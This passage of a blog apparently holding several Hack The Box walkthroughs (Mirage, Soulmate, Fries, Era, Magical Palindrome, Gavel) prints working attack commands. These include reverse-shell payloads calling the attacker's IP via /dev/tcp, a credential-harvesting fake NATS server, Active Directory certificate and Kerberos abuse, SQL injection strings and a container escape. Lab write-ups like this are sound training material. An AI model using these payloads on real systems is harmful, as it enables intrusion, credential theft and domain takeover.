3268/tcp  open  ldap            syn-ack Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
3269/tcp  open  ssl/ldap        syn-ack Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
4222/tcp  open  vrml-multi-use? syn-ack
5985/tcp  open  http            syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf          syn-ack .NET Message Framing
47001/tcp open  http            syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc           syn-ack Microsoft Windows RPC
49665/tcp open  msrpc           syn-ack Microsoft Windows RPC
49666/tcp open  msrpc           syn-ack Microsoft Windows RPC
49667/tcp open  msrpc           syn-ack Microsoft Windows RPC
49668/tcp open  msrpc           syn-ack Microsoft Windows RPC
55614/tcp open  msrpc           syn-ack Microsoft Windows RPC
55623/tcp open  ncacn_http      syn-ack Microsoft Windows RPC over HTTP 1.0
55624/tcp open  msrpc           syn-ack Microsoft Windows RPC
55637/tcp open  msrpc           syn-ack Microsoft Windows RPC
55640/tcp open  msrpc           syn-ack Microsoft Windows RPC
55662/tcp open  msrpc           syn-ack Microsoft Windows RPC
55678/tcp open  msrpc           syn-ack Microsoft Windows RPC
62998/tcp open  msrpc           syn-ack Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-11-22T20:20:34
|_  start_date: N/A
|_clock-skew: 2h34m18s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 38031/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 16776/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 62882/udp): CLEAN (Timeout)
|   Check 4 (port 35574/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked

I started off by mounting the nfs share.

2049/TCP - NFS

In both cases the pdf files were password restricted:

qpdf - PDF conversion

We were unable to open it. Luckily for us there's a tool called qpdf that will be able to transform it:

A subdomain stands out:

nats-svc.mirage.htb

In the other report there is important info found about the domain abolishing NTLM as a log-in method. Instead they will from now on only use Kerberos authentication:

There is also an email found:

Nevertheless I add the found subdomain to my /etc/hosts list and try to query the subdomain using dig.

Interesting, there are actually no records found eventhough the pdf mentions this subdomain is critical for internal services.

53/TCP - DNS

DNS Injection

We can use the nsdupdate tool to update the DNS records of the subdomain in order to spoof it as our own IP:

Then using the following script we will start a fake nats server on port 4222. The host should try to connect to us since we've updated the DNS records by pointing the subdomain to our own IP.

import socket
import threading

HOST = '0.0.0.0'
PORT = 4222

def handle_client(conn, addr):
    print(f"[+] Connection from {addr}")

    info = (
        'INFO {"server_id":"fake-server","version":"2.9.9","proto":1,'
        '"go":"go1.20.0","host":"fake-nats","port":4222,"max_payload":1048576}\r\n'
    )
    conn.send(info.encode())

    try:
        while True:
            data = conn.recv(4096)
            if not data:
                break
            print(f"[DATA] {addr} >>> {data.decode(errors='ignore')}")
    except Exception as e:
        print(f"[!] Error from {addr}: {e}")
    finally:
        conn.close()
        print(f"[-] Connection closed: {addr}")

def start_server():
    print(f"[*] Starting fake NATS server on {HOST}:{PORT}")
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind((HOST, PORT))
        s.listen()
        while True:
            conn, addr = s.accept()
            thread = threading.Thread(target=handle_client, args=(conn, addr))
            thread.start()

if __name__ == '__main__':
    start_server()

By running the above script we get a connection from the target:

We've acquired a set of credentials:

Dev_Account_A
hx5h7F5554fP@1337!

4222/TCP - Nats

We can now connect via the nats service with the found creds. This can be done by installing the natscli tool using go:

Next up we're going to be running 3 commands in the following order:

nats --context dev-nats sub ">" --count 10

Once we run the above in one terminal we'll want to run the next in another terminal:

nats --context dev-nats consumer add auth_logs audit-reader --pull --ack=explicit

Here we can just keep clicking enter until it is done. Lastly we'll use the following command:

nats --context dev-nats consumer next auth_logs audit-reader --count=5 --wait=5s --ack

Combined it will look like this:

We see that the output from the last command gives us a set of credentials.

david.jjackson
pN8kQmn6b86!1234@

:::note I connected to the NATS broker using the dev context, then created a consumer on the auth_logs stream so I could pull messages from it. After that, I fetched the next batch of log entries, and the broker handed me an authentication log containing a real username and password. By acknowledging the message, I told the server I had successfully received it. :::

nxc

Since NTLM logon doesn't work ( as confirmed per below ):

We will need to request a TGT.

Afterwards we can see that it works just fine using kerberos auth:

I quickly move on to enumerating users:

I then add these accounts to my usernames file in order to password spray later on.

BloodHound

More importantly I moved on to bloodhound so I can graph everything out.

I boot up bloodhound and ingest the files:

At first glance there was nothing useful found at all.

However when we run the All Kerberoastable Users query it returns the following user:

This user turns out to be part of the IT_ADMINS group and even has remote management:

Let's kerberoast them.

Exploitation

kerberoasting

impacket-GetUserSPNs mirage.htb/david.jjackson:'pN8kQmn6b86!1234@' -target-domain mirage.htb -dc-ip 10.10.11.78 -request -dc-host dc01.mirage.htb -k -save -debug

I then cracked the hash using john:

3edc#EDC3

I then requested a TGT using the creds:

In order to use this to ticket to log in I had to modify the /etc/krb5.conf file:

Foothold

Shell as nathan.aadam

I logged in as the user via winrmexec:

Here I was instantly able to grab the flag.

user.txt

Enumeration

Since bloodhound didn't yield anything further I started up winpeas to do some enumeration:

While scrolling down I found something interesting:

mark.bbond
1day@atime

I thus added the user to my "owned" list:

Now it became quite interesting:

Lateral Movement

ForceChangePassword

First I got a TGT for mark:

First off we'll want to enable the account again:

bloodyAD --host dc01.mirage.htb -d mirage.htb -u 'mark.bbond' -k remove uac "javier.mmarshall" -f ACCOUNTDISABLE

Then used bloodyAD to change the password for javier:

bloodyAD --host dc01.mirage.htb -d mirage.htb -u 'mark.bbond' -k set password "javier.mmarshall" "P@ssword123"

Next up we need to enable the account:

dn: CN=javier.mmarshall,OU=Users,OU=Disabled,DC=mirage,DC=htb
changetype: modify
replace: logonHours
logonHours:: ////////////////////////////

We use ldapmodify to modify the entry:

ldapmodify -H ldap://dc01.mirage.htb -D "mark.bbond@mirage.htb" -w '1day@atime' -f javier_hours.ldif

Now that all's done we can get the TGT and export it:

ReadgMSApassword

This one is pretty straightforward:

nxc ldap mirage.htb -u 'javier.mmarshall' -p 'P@ssword123' -k --gmsa

Next I yet again requested a TGT:

Privilege Escalation

ESC10

Detection

Next up the following was discovered:

reg query HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\Schannel

As well as:

Get-Item -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Kdc"

When I checked those registry keys, I realized the domain controller has StrongCertificateBindingEnforcement enabled (value = 1), but Schannel is still configured to allow weak certificate mapping through CertificateMappingMethods = 0x4 (UPN mapping).

This combination means the DC will accept non‑strong mappings for certificate-based logon, creating an ESC10 ADCS vulnerability. In other words, if I can obtain or forge a certificate with a victim’s UPN, the DC will still let me authenticate as that user despite strong binding being “enabled.”

Exploitation

I'll start off with certipy-ad by updating the account of mark.bbond:

certipy-ad account update -k -no-pass -user mark.bbond -upn 'DC01$@mirage.htb' -dc-host dc01.mirage.htb -target dc01.mirage.htb

Next up I'll export the cache for mark again and request the certificate:

certipy-ad req -ca 'mirage-DC01-CA' -dc-host dc01.mirage.htb -target dc01.mirage.htb -k -no-pass

Next up:

certipy-ad account update -k -no-pass -user mark.bbond -upn 'mark.bbond@mirage.htb' -dc-host dc01.mirage.htb -target dc01.mirage.htb

Now we're going to authenticate and get an interactive shell:

certipy-ad auth -pfx dc01.pfx -dc-ip 10.10.11.78 -ldap-shell

S4U2Proxy

While in the interactive shell I used the following command to modify the delegation rights.

set_rbcd dc01$ nathan.aadam

We can then request a service ticket:

impacket-getST -u2u -impersonate "dc01$" -spn "cifs/dc01.mirage.htb" -k -no-pass 'mirage.htb/nathan.aadam'

dcsync

From here we can dcsync and get access as Administrator.

root.txt

HTB-Soulmate

Maxim Andrei Koltypin — Mon, 24 Nov 2025 00:00:00 GMT

Scope:
10.10.11.86

Recon

Nmap

sudo nmap -sC -sV -sT -Pn -T5 -vvvv --min-rate=5000 10.10.11.86

PORT      STATE    SERVICE              REASON      VERSION
22/tcp    open     ssh                  syn-ack     OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
80/tcp    open     http                 syn-ack     nginx 1.18.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Soulmate - Find Your Perfect Match
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set

80/TCP - HTTP

I checked the site out but found nothing useful.

ftp.soulmate.htb

I did a vhost scan using ffuf:

ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt:FUZZ -u http://soulmate.htb -H "Host:FUZZ.soulmate.htb" -fs 154

I headed over to the vhost and found that it was a CrushFTP web UI:

I tried to log in using admin - admin and got this xml error:

I checked out the request in burp:

I didn't find anything that could be exploited in the request right away so searched for PoC's:

Since I didn't know the version this was more or less guess work.

Exploitation

CVE-2025-31161

The following article seemed interesting:

The PoC is pretty straightforward:

Let's exploit it.

python3 cve-2025-31161.py --target_host ftp.soulmate.htb --port 80 --target_user admin --new_user tester --password 'P@ssword123'

We now get valid access:

I clicked on the Admin tab and got redirected:

Amongst the Recent Logins I notice the crushadmin user as well as the 172.19.0.1 IP address. This IP makes me think that the ftp web UI is running inside of a docker container, I'll see later on whether my assumptions are right.

Logging in as ben

I headed over to the User Manager tab where I found the user ben which had access to some interesting directories including webProd.

I went ahead and changed the password for the user and logged in with their creds.

Since all the files inside are with the .php extension I went ahead and dropped in a webshell:

I could now go ahead and access it by heading over to http://soulmate.htb/webshell.php.

As we see from the ip a output the CrushFTP instance was indeed running from inside of a docker container:

Foothold

Shell as www-data

Using the following reverse shell payload I got myself a shell:

What's funny is that the file that we've uploaded was actually owned by root:

I then found the config file:

Inside the file I found the admin password:

Crush4dmin990

Unfortunately this password was not reused anywhere.

SSH as ben

During my further enumeration of the machine I uploaded pspy32 and checked out the running processes:

Inside the script the credentials for ben were found:

ben
HouseH0ldings998

Using these creds I was able to log in via ssh:

user.txt

Privilege Escalation

2222/TCP - SSH

I quickly found out that I was unable to run sudo:

I wasn't part of any good groups either:

I then remembered the script that we found mentioned port 2222 on localhost:

I logged into the service via ssh:

Since this was an erlang_shell instead of a regular one we needed to execute commands differently:

Thus I gave myself a root reverse shell:

root.txt

HTB-Fries

Maxim Andrei Koltypin — Tue, 25 Nov 2025 00:00:00 GMT

import PasswordProtect from "~/components/PasswordProtect.client";

Scope:
10.10.11.96

Creds:
d.cooper@fries.htb
D4LE11maan!!

Recon

Nmap

sudo nmap -sC -sV -sT -p- -vvvv -T5 --min-rate=5000 -Pn fries.htb

PORT      STATE SERVICE       REASON  VERSION
22/tcp    open  ssh           syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
53/tcp    open  domain        syn-ack Simple DNS Plus
80/tcp    open  http          syn-ack nginx 1.18.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: OPTIONS GET HEAD
|_http-title: Welcome to Fries - Fries Restaurant
|_http-server-header: nginx/1.18.0 (Ubuntu)
88/tcp    open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2025-11-23 02:02:57Z)
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: fries.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-11-23T02:04:36+00:00; +1h59m20s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:DC01.fries.htb, DNS:fries.htb, DNS:FRIES
| Issuer: commonName=fries-DC01-CA/domainComponent=fries
443/tcp   open  ssl/http      syn-ack nginx 1.18.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| tls-alpn: 
|_  http/1.1
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_ssl-date: TLS randomness does not represent time
|_http-favicon: Unknown favicon MD5: F588322AAF157D82BB030AF1EFFD8CF9
|_http-title: Site doesnt have a title (text/html;charset=ISO-8859-1).
| ssl-cert: Subject: commonName=pwm.fries.htb/organizationName=Fries Foods LTD/stateOrProvinceName=Madrid/countryName=SP/organizationalUnitName=PWM Configuration/emailAddress=web@fries.htb/localityName=Madrid
| Issuer: commonName=pwm.fries.htb/organizationName=Fries Foods LTD/stateOrProvinceName=Madrid/countryName=SP/organizationalUnitName=PWM Configuration/emailAddress=web@fries.htb/localityName=Madrid
445/tcp   open  microsoft-ds? syn-ack
464/tcp   open  kpasswd5?     syn-ack
593/tcp   open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      syn-ack Microsoft Windows Active Directory LDAP (Domain: fries.htb0., Site: Default-First-Site-Name)
2179/tcp  open  vmrdp?        syn-ack
3268/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: fries.htb0., Site: Default-First-Site-Name)
3269/tcp  open  ssl/ldap      syn-ack Microsoft Windows Active Directory LDAP (Domain: fries.htb0., Site: Default-First-Site-Name)
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        syn-ack .NET Message Framing
49666/tcp open  msrpc         syn-ack Microsoft Windows RPC
49685/tcp open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
49686/tcp open  msrpc         syn-ack Microsoft Windows RPC
49688/tcp open  msrpc         syn-ack Microsoft Windows RPC
49689/tcp open  msrpc         syn-ack Microsoft Windows RPC
49913/tcp open  msrpc         syn-ack Microsoft Windows RPC
49946/tcp open  msrpc         syn-ack Microsoft Windows RPC
Service Info: Host: DC01; OSs: Linux, Windows; CPE: cpe:/o:linux:linux_kernel, cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-11-23T02:03:54
|_  start_date: N/A
|_clock-skew: mean: 1h59m19s, deviation: 1s, median: 1h59m19s
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 46245/tcp): CLEAN (Timeout)
|   Check 2 (port 47430/tcp): CLEAN (Timeout)
|   Check 3 (port 23943/udp): CLEAN (Timeout)
|   Check 4 (port 21385/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

443/TCP - HTTPS

When trying to log in using the provided ldap creds we get the following message:

We notice a new username svc_infra.

I also found that the Password Manager is an open-source project called pwm:

It seems that the latest version from february 2025 is installed.

Other than that there doesn't seem to be more going on for us.

80/TCP - HTTP

Over here I found a static website with nothing else really.

code.fries.htb

I decided to use ffuf to enumerate vhosts:

Here I was able to log in with the provided creds:

I headed over to the repo and started analysing it.

Inside the initial commit I found the credentials for postgresql:

root
PsqLR00tpaSS11

And perhaps the secret key could be reused somewhere:

y0st528wn1idjk3b9a

I then found the following inside the README.md

Another vhost:

db-mgmt05.fries.htb

db-mgmt05.fries.htb

I headed over to the db instance:

Here again I logged in with the creds for dale:

When trying to connect to the server we're prompted the following:

We enter the previously found root password here and get access:

I expanded it and checked the gitea database:

Here I right clicked on the user table to view all the rows:

I tried cracking the Administrator password but this did not work.

Docker Foothold - RABBITHOLE

RCE via PostGreSQL UI

I tried out some queries and noticed I had file read

And even file write!

I then tried to see whether I had command execution:

Since all of the above worked I went ahead and tested a reverse shell payload.

CREATE TABLE cmd_out3(line text);
COPY cmd_out3 FROM PROGRAM '/bin/bash -c "bash -i >& /dev/tcp/10.10.14.42/80 0>&1"';
SELECT * FROM cmd_out3;

I now finally had a shell inside the Linux docker container.

###I Living Off The Land ( LOTL )

I tried to copy over some files using wget or curl but none were available:

Instead I looked on GTFObins for some Living Off The Land (LOTL) commands:

I used it to transfer various files:

export RHOST=10.10.14.126
export RPORT=8000
export LFILE=<FILENAME HERE>
bash -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \
    3<>/dev/tcp/$RHOST/$RPORT \
    | { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE'

Enumeration

linpeas

I ran linpeas in order to enumerate the environment and find out what I could do here.

Some findings included:

Unfortunately other than that I didn't find anything useful so instead booted up ligolo in order to scan the network.

Linux Foothold

CVE-2025-2945

I started looking further and realized I landed inside a rabbithole. Instead I searched up the version of the pgadmin instance and found a CVE for it:

But the above PoC didnt work since it didn't work with kerberos auth. Instead I used the metasploit module it's based upon:

Once I put down the following options I was able to run it successfully:

I started enumerating the directory:

From here I enumerated the env variables where I found a cleartext password:

Friesf00Ds2025!!

Next up I tried spraying this password against found users until I found one that matched:

SSH Access

Using these creds I logged in:

Mounting NFS Share

I used ligolo to port forward so I could access the nfs service:

Once I had the port forward set up I created the drive I would mount the share

sudo mkdir ./mount
sudo mount -t nfs -o ro,soft,timeo=10 240.0.0.1:/srv/web.fries.htb/certs ./mount

I could still not access the mount though becaues I did not have the proper GUID:

In order to get access I had to create a "dummy" account with this GUID.

sudo useradd tester
sudo nano /etc/passwd

# Add the following GUID
tester:x:1001:59605603::/home/tester:/bin/sh

Now we should be able to access the mounted share.

sudo -u tester cp -r mount /tmp/mount
sudo chown kali /tmp/mount
sudo chown kali /tmp/mount/*
sudo umount ./mount

Crafting certificate

For the following steps I'll craft a certificate where CN=root:

cat > root.cnf
[ req ]
distinguished_name = req_distinguished_name
prompt = no

[ req_distinguished_name ]
CN = root

Next I will cuse the following commands:

openssl genrsa -out key.pem 2048
openssl req -new -key key.pem -out root.csr -config root.cnf

Now we create the cert.pem certificate:

openssl x509 -req -in root.csr \
  -CA ca.pem -CAkey ca-key.pem -CAcreateserial \
  -out cert.pem -days 365 -sha256

Docker

We will now have to use the following commands to spin up the docker container:

docker context create fries \
  --docker host=tcp://240.0.0.1:2376 \ 
  --docker ca=/home/kali/Fries/ca.pem \
  --docker cert=/home/kali/Fries/cert.pem \
  --docker key=/home/kali/Fries/key.pem \
  --docker skip-tls-verify=true
  
  
docker context use fries

We can check it out:

Looks good!

Linux Privilege Escalation

We can simply use the following command to to give ourselves a root shell on the system:

docker run -it --rm --privileged --net=host --pid=host -v /:/mnt 616e340baeac bash -c "chroot /mnt /bin/bash || chroot /mnt /bin/sh"

user.txt

Finally we're able to grab the user.txt flag:

Post-Exploitation

PWM Config

During post-exploitation I stumbled on this hash which I then cracked:

rockon!

This password can then be used to access the pwm Configuration Manager:

I clicked on Download Configuration:

This was the same exact config however. Instead I headed over to the Configuration Editor where I headed over to LDAP -> LDAP Directories -> default -> Connection:

Here I changed the LDAP URLs to my own URL:

And clicked Test LDAP Profile. I then captured the cleartext password using responder:

svc_infra
m6tneOMAh5p0wQ0d

DC01 Enumeration

BloodHound

Now that I had a valid set of creds I checked their validity via NTLM logon:

This meant I didn't need kerberos login, let's use bloodhound to enumerate the system:

I started up bloodhound and went to work.

ReadGMSAPassword

Here I noticed the following:

This is pretty straightforward to exploit using nxc:

nxc ldap fries.htb -u usernames.txt -p passwords.txt --gmsa

And we get the NTLM hash for gMSA_CA_prod$.

fc20b3d3ec179c5339ca59fbefc18f4a

I checked the account information where I found the following:

DC01 Privilege Escalation

ADCS - ESC7

I requested a TGT for the found user:

impacket-getTGT 'fries.htb/gMSA_CA_prod$' -hashes :fc20b3d3ec179c5339ca59fbefc18f4a -dc-ip 10.10.11.96

I then used certipy-ad to enumerate the ADCS vulnerabilities:

certipy-ad find -k -dc-ip 10.10.11.96 -target DC01.fries.htb -stdout -vulnerable

It looks like the target is vulnerable to ESC7.

Exploitation

First of all we'll have to modify the /etc/krb5.conf file:

To exploit this we can use the following commands:

certipy-ad ca \
  -ca fries-DC01-CA \
  -add-officer 'gMSA_CA_prod$' \
  -dc-ip 10.10.11.96 \
  -dc-host DC01.fries.htb \
  -target DC01.fries.htb \
  -k

:::note However this is where I ended up in some trouble, for whatever reason certipy-ad didn't give me the full picture. Instead I used evil-winrm-py to login with the kerberos ticket. :::

After logging in I transferred over certify.exe and reran my enumeration steps.

I then used the tool to enumerate everything:

.\Certify.exe enum-cas --filter-vulnerable --hide-admins

I starting looking through the output.

And down at the bottom we notice the enabled certificates:

I issued the following command:

./Certify.exe manage-ca --officer S-1-5-21-858338346-3861030516-3975240472-1104 --ca FRIES.HTB\fries-DC01-CA

And followed it up with adding the group which had the Deny set on ManageCertificates so I could overwrite it:

.\Certify.exe manage-ca --ca FRIES.HTB\fries-DC01-CA --officer 'S-1-5-21-858338346-3861030516-3975240472-515'

Request Issue - FAIL

Now I could issue a request:

certipy-ad req -u 'gmsa_ca_prod$' -hashes fc20b3d3ec179c5339ca59fbefc18f4a -dc-ip 10.10.11.96 -dc-host dc01.fries.htb -target dc01.fries.htb -ca fries-DC01-CA -template subca -upn 'administrator@fries.htb'

This fails but we still need save the private key. Next up:

certipy-ad -debug ca -ca fries-DC01-CA -dc-ip 10.10.11.96 -u 'gMSA_CA_prod$@fries.htb' -hashes :fc20b3d3ec179c5339ca59fbefc18f4a -k -target dc01.fries.htb -issue-request 42

And lastly we retrieve it:

certipy-ad req -u 'gMSA_CA_prod$@fries.htb' -hashes :fc20b3d3ec179c5339ca59fbefc18f4a -k -dc-ip 10.10.11.96 -dc-host dc01.fries.htb -target dc01.fries.htb -ca fries-DC01-CA -retrieve 42

Unfortunately though this is where we hit a roadblock:

Request Issue - SUCCESS

It appears we'll need to request the certificate including the Administrator SID:

This basically meant I had to redo the requests again, but this time around involving the SID:

certipy-ad req -u 'gmsa_ca_prod$' -hashes fc20b3d3ec179c5339ca59fbefc18f4a -dc-ip 10.10.11.96 -dc-host dc01.fries.htb -target dc01.fries.htb -ca fries-DC01-CA -template subca -upn 'administrator@fries.htb' -sid "S-1-5-21-858338346-3861030516-3975240472-500"

certipy-ad -debug ca -ca fries-DC01-CA -dc-ip 10.10.11.96 -u 'gMSA_CA_prod$@fries.htb' -hashes :fc20b3d3ec179c5339ca59fbefc18f4a -k -target dc01.fries.htb -issue-request 43

certipy-ad -debug req -u 'gMSA_CA_prod$@fries.htb' -hashes :fc20b3d3ec179c5339ca59fbefc18f4a -k -dc-ip 10.10.11.96 -dc-host dc01.fries.htb -target dc01.fries.htb -ca fries-DC01-CA -retrieve 43

This time around it worked!

I could now easily get access with the saved kerberos ticket:

root.txt

</PasswordProtect>

HTB-Era

Maxim Andrei Koltypin — Wed, 26 Nov 2025 00:00:00 GMT

Scope:
10.10.11.79

Recon

Nmap

sudo nmap -sC -sV -sT -Pn -T5 -vvvv --min-rate=5000 era.htb

PORT   STATE SERVICE REASON  VERSION
21/tcp open  ftp     syn-ack vsftpd 3.0.5
80/tcp open  http    syn-ack nginx 1.18.0 (Ubuntu)
|_http-favicon: Unknown favicon MD5: 0309B7B14DF62A797B431119ADB37B14
|_http-title: Era Designs
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

80/TCP - HTTP

I start off with directory enumeration and vhost fuzzing:

On the main site nothing special was found so I ran a vhost scan and found the file vhost:

I added the vhost to my /etc/hosts file and checked it out:

I then enumerated the vhost as well:

file.era.htb

I went over to the /register.php endpoint and registered a new user:

After signing in I got redirected to the /manage.php page:

I went ahead and uploaded a webshell:

Unfortunately we can only download after uploading it but not actually access it:

However what I noticed was the id parameter:

http://file.era.htb/download.php?id=

This meant I could probably try to brute force other files and or directories.

I went ahead and created a list of possible id's:

And used ffufto brute force it.

ffuf -w id.txt:FUZZ -H "Cookie: PHPSESSID=lc464hh0fbipb8frebpm6otfv1" -u "http://file.era.htb/download.php?id=FUZZ" -fs 7686

I checked out the brute forced id's:

Once downloaded I unzipped the archive:

I found a filedb.sqlite database and checked that out as well:

john

I then used john to attempt to crack these hashes:

america
mustang

I also checked out the download.php source code and saw this:

Next up we can change the security questions for the admin user so we can bypass normal security using the security questions instead via /security_login.php:

Now that it's updated I logged in:

Foothold

21/TCP - FTP

Nothing here could initially be done so I resprayed the passwords against ftp:

Using these creds I logged in:

Inside the php8.1_conf I noticed the ssh2 extension:

[!note] Since ssh isn't exposed to the external network we might be able to leverage this extension to log in via the website.

Shell as eric

I checked out the docs where I found my answer:

I then put it all together and created the following payload, where I made sure to base64 encode the actual reverse shell payload (since the normal way or URL encoding didn't work).

For this I'll base64 encode the following:

(bash >& /dev/tcp/10.10.14.5/80  0>&1) &

And insert it into the following payload:

http://file.era.htb/download.php?id=54&show=true&format=ssh2.exec://eric:america@127.0.0.1/bash%20-c%20%27printf%20<INSERT_BASE64_PAYLOAD_HERE>|base64%20-d|bash%27;

the user flag is up for grabs:

user.txt

Privilege Escalation

Enumeration

I noticed that eric is part of the devs group:

During further enum I found a folder that I had access to with said group:

Inside was a script called monitor:

I suspected that this was some sort of cron job so checked it out using pspy64:

After a very short while the following process popped up:

[!note] By replacing the original executable with my own payload while preserving its location and permissions, I could place my code to run the next time the scheduled job triggered.

Reverse Shell as root

In order to exploit the process we can create a reverse shell payload first:

#include <stdlib.h>
int main() {
    system("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.5/443 0>&1'");
    return 0;
}

Then using the following commands we compile and overwrite the monitor binary with our shell reverse shell. This should execute a periodic reverse shell to our listener.

gcc shell.c -o shell
objcopy --dump-section .text_sig=text_sig /opt/AV/periodic-checks/monitor
objcopy --add-section .text_sig=text_sig shell 
cp shell monitor

Then after a short wait I receive the shell:

root.txt

HTB-Magical Palindrome

Maxim Andrei Koltypin — Sat, 29 Nov 2025 00:00:00 GMT

Scope:
94.237.63.176:33769

Source Code Review

I started off by downloading and extracting the pack:

Inside I found the following contents:

In order to view the source code I booted up vscode (this is not necessary but syntax highlighting is always a nice to have):

The site itself just looked as follows:

Inside the index.mjs we see where the magic happens:

Checking the source code we can conclude the following:

The server never verifies that palindrome is actually a string, so an attacker can provide an object with a forged .length property.
JavaScript’s numeric coercion makes "1000" behave like the number 1000, allowing the length check to pass.
The palindrome loop then only inspects keys 0 and 999, so supplying matching values for those two keys makes the validator incorrectly accept the object as a valid palindrome.

Exploitation

Since the string length has to be over 1000 I tried the following first:

This gave me the above response.

I could bypass it using the following JSON string:

{"palindrome":{"length":"1000","0":"a","999":"a"}}

HTB-Gavel

Maxim Andrei Koltypin — Mon, 01 Dec 2025 00:00:00 GMT

import PasswordProtect from '~/components/PasswordProtect.client';

Scope:
10.10.11.97

Recon

Nmap

sudo nmap -sC -sV -sT -p- --min-rate=5000 -Pn gavel.htb -T5 -vvvv

PORT      STATE    SERVICE        REASON      VERSION
22/tcp    open     ssh            syn-ack     OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
80/tcp    open     http           syn-ack     Apache httpd 2.4.52
|_http-favicon: Unknown favicon MD5: 954223287BC6EB88C5DD3C79083B91E1
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-git: 
|   10.10.11.97:80/.git/
|     Git repository found!
|     .git/config matched patterns 'user'
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: .. 
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Gavel Auction

Right away I notice that a git repo was found, let's enumerate it with git-dumper.

git-dumper

In order to view the source code easier I launched vscode and viewed it there.

Some interesting code I found was the following:

I would need to create a user first and check it out on the website to fully understand the inner workings, but at first glance this looks like a SQL Injection.

80/TCP - HTTP

I went over to the website and registered a new tester account:

Once registered I logged in:

I started bidding on some auctions and once I had won a couple I could view them in my inventory:

When we change the parameters from POST to GET the URL looks as follows:

I tried injecting the sort parameter since that's what appeared to be injectable from our source code review.

This way we could query all parts of the item:

Exploitation

Blind SQLi - Intended Method

I turns out that in order to successfully inject any SQLi queries here we will have to attack both params. Thus we need to change the following:

SELECT $col FROM inventory WHERE user_id = ? ORDER BY item_name ASC

To this somehow:

SELECT x FROM (SELECT CONCAT(username, 0x3a, password) AS 'x' FROM users) y;

When we put this all together it looks as follows:

http://gavel.htb/inventory.php?user_id=x`+FROM+(SELECT+CONCAT(username,0x3a,password)+AS+`'x`+from+users)y;--&sort=\?;--%00

Using the above query we're able to acquire the password hash for auctioneer.

This hash is then easily cracked using john:

auctioneer
midnight1

Ffuf - Alternative Method

Alternatively we could just brute force the password. After having found the auctioneer username inside the source code we can attempt a brute-force attack:

ffuf -w /usr/share/wordlists/rockyou.txt:FUZZ -u "http://gavel.htb/login.php" -X POST -H "Content-Type: application/x-www-form-urlencoded" -H "Cookie: gavel_session=59o57iuco1ickd6da1tgt7q075" -d "username=auctioneer&password=FUZZ" -fr "Invalid username or password."

Admin Panel

We can now use the found credentials to log into the admin panel using the auctioneer admin user:

Inside the Admin Panel we can edit the active bids:

I then went ahead and tested out the functionality here by supplying some sample text and analysed it using caido:

Foothold

Shell as www-data

I then tried out the following payload inside the rule form.

Once we then place a bid we get a reverse shell:

Lateral Movement to auctioneer

Once we got a reverse shell we can easily su to auctioneer using the same password that we used to log into the website:

user.txt

During further enum I noticed that the user is part of a non-default group:

I am not allowed to run sudo though:

I transferred over pspy64 and ran it:

I found a process running under root which was using the auction_watcher.sh script.

Privilege Escalation

gavel-util

I started checking for other files and found this binary related to gavel:

I ran the binary and found the following:

